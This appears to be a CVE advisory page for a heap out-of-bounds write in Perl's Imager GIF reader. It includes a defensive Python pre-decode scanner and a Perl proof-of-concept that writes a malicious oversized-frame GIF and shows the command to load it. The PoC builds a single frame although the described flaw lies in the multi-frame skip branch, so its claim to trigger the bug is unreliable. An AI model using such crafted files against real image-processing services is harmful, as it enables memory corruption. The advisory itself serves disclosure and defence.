Security Vulnerability Report
CVE-2026-8669 CVSS 6.5 MEDIUM

CVE-2026-8669

Published: 2026-05-15 15:16:57
Last Modified: 2026-05-15 22:16:57
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Imager versions through 1.030 for Perl allow a heap out of bounds (OOB) write on crafted multi-frame GIF files.

Imager::File::GIF's i_readgif_multi_low allocates a single per-row buffer GifRow sized for the GIF's global screen width 'SWidth' and reuses it across every image in the file.

The page-match branch validates Image.Width + Image.Left > SWidth before each DGifGetLine write, but the parallel skip-image branch at imgif.c:790-805 calls DGifGetLine(GifFile, GifRow, Width) with no such check.
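
A pre-decode screen for untrusted GIF input, added here as an example and not taken from Imager or the advisory: it walks every frame, including ones a reader would skip, and reports any image descriptor whose Left + Width exceeds the logical screen width, the condition the description says the page-match branch checks. The names frames_wider_than_screen and build_gif are hypothetical, and the sample GIFs are constructed.

```python
import struct

def _skip_sub_blocks(data, pos):
    """Advance past length-prefixed sub-blocks up to the 0x00 terminator."""
    while data[pos] != 0:
        pos += 1 + data[pos]
    return pos + 1

def frames_wider_than_screen(data):
    """Return (frame, left, width, screen_width) for each image descriptor
    whose Left + Width exceeds the logical screen width."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    bad, frame = [], 0
    try:
        swidth, _sheight, packed = struct.unpack_from("<HHB", data, 6)
        pos = 13
        if packed & 0x80:                      # global colour table present
            pos += 3 * (2 << (packed & 0x07))
        while data[pos] != 0x3B:               # 0x3B = trailer
            block = data[pos]
            if block == 0x21:                  # extension: label, then sub-blocks
                pos = _skip_sub_blocks(data, pos + 2)
            elif block == 0x2C:                # image descriptor
                left, _top, width, _height, ipacked = struct.unpack_from(
                    "<HHHHB", data, pos + 1)
                if left + width > swidth:
                    bad.append((frame, left, width, swidth))
                pos += 10
                if ipacked & 0x80:             # local colour table present
                    pos += 3 * (2 << (ipacked & 0x07))
                pos = _skip_sub_blocks(data, pos + 1)  # +1: LZW min code size
                frame += 1
            else:
                raise ValueError(f"unknown block 0x{block:02x} at offset {pos}")
    except (IndexError, struct.error):
        raise ValueError("truncated GIF") from None
    return bad

def build_gif(swidth, frames):
    """Constructed sample input: minimal GIF with one (left, width) per frame."""
    out = b"GIF89a" + struct.pack("<HHBBB", swidth, 10, 0x80, 0, 0) + bytes(6)
    for left, width in frames:
        out += b"\x2C" + struct.pack("<HHHHB", left, 0, width, 1, 0)
        out += b"\x02\x02\x4C\x01\x00"   # LZW min code size, one sub-block, end
    return out + b"\x3B"

if __name__ == "__main__":
    print(frames_wider_than_screen(build_gif(10, [(0, 10), (0, 100)])))
```

The scanner never decodes LZW data; it reads only the block structure, so it can run before the file reaches the image library.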

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Imager <= 1.030

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```perl
# PoC for CVE-2026-8669
# This script generates a malicious multi-frame GIF file designed to trigger
# the heap out-of-bounds write in Imager <= 1.030.
# The vulnerability occurs because the frame width (100) exceeds the logical screen width (10).
use strict;
use warnings;

my $poc_file = "cve_2026_8669_poc.gif";

# 1. GIF Header and Logical Screen Descriptor
# Signature: GIF89a
# Width: 10 pixels (0x000A)
# Height: 10 pixels (0x000A)
my $header = "GIF89a" . pack("v", 10) . pack("v", 10);
# Packed Fields: Global color table flag (1), Color resolution (7), Sort flag (0), Size of GCT (7 -> 256)
# Background Color Index: 0
# Pixel Aspect Ratio: 0
$header .= "\xF7\x00\x00";

# 2. Global Color Table (Simplified, just black)
$header .= "\x00\x00\x00" x 256;

# 3. Application Extension (Looping)
$header .= "\x21\xFF\x0BNETSCAPE2.0\x03\x01\x00\x00\x00";

# 4. Image Descriptor (The malicious frame)
# Image Separator: 0x2C
# Left, Top: 0, 0
# Width: 100 (0x0064) - This is larger than Screen Width (10)
# Height: 10
# Packed Fields: Local Color Table flag (0)
my $img_desc = "\x2C" . pack("v", 0) . pack("v", 0) . pack("v", 100) . pack("v", 10) . "\x00";

# 5. Image Data
# LZW Minimum Code Size: 8
my $data_subblocks = "\x08";
# Data Sub-block: Size 255, filled with 'A's (arbitrary data)
# This data will overflow the GifRow buffer during DGifGetLine
$data_subblocks .= "\xFF" . ("A" x 255);
# Block Terminator
$data_subblocks .= "\x00";

# 6. GIF Trailer
my $trailer = "\x3B";

# Write the file
open(my $fh, '>', $poc_file) or die "Cannot open $poc_file: $!";
binmode($fh);
print $fh $header . $img_desc . $data_subblocks . $trailer;
close($fh);

print "[+] Malicious GIF file generated: $poc_file\n";
print "[+] To test vulnerability, use Imager to read the file:\n";
print " perl -MImager -e 'Imager->new(file=>\"$poc_file\")'\n";
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8669", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-15T15:16:57.043", "lastModified": "2026-05-15T22:16:56.887", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Imager versions through 1.030 for Perl allow a heap out of bounds (OOB) write on crafted multi-frame GIF files.\n\nImager::File::GIF's i_readgif_multi_low allocates a single per-row buffer GifRow sized for the GIF's global screen width 'SWidth' and reuses it across every image in the file.\n\nThe page-match branch validates Image.Width + Image.Left > SWidth before each DGifGetLine write, but the parallel skip-image branch at imgif.c:790-805 calls DGifGetLine(GifFile, GifRow, Width) with no such check."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://github.com/tonycoz/imager/commit/782e9c06cc75a0f7eed383f39522f51f44598b04.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/TONYC/Imager-1.031/source/Changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/15/17", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}